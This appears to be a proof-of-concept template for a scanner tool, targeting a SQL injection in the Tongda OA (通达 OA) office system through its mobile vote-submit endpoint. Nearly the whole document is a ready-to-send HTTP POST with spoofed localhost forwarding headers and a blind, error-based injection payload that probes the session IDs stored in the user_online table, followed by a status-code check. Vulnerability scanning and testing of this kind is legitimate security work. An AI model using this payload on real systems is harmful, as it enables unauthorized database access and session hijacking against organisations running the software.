<DudePoc_Name>通达 OA sql注入漏洞</DudePoc_Name>
<DudePoc_Description>通达 OA sql注入漏洞</DudePoc_Description>
<DudePoc_SetHeader>
POST /mobile/api/qyapp.vote.submit.php HTTP/1.1
Host: $<AttackHost>$
Content-Length: 0
X-Forwarded-For: 127.0.0.1
X-Originating: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>
submitData={"a":{"vote_type":"1","vote_id":"if(length((select SID from user_online limit 0,1))=26,1,2*1e308)","value":"1"}}
</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData></DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode></DudePoc_AttackCode>
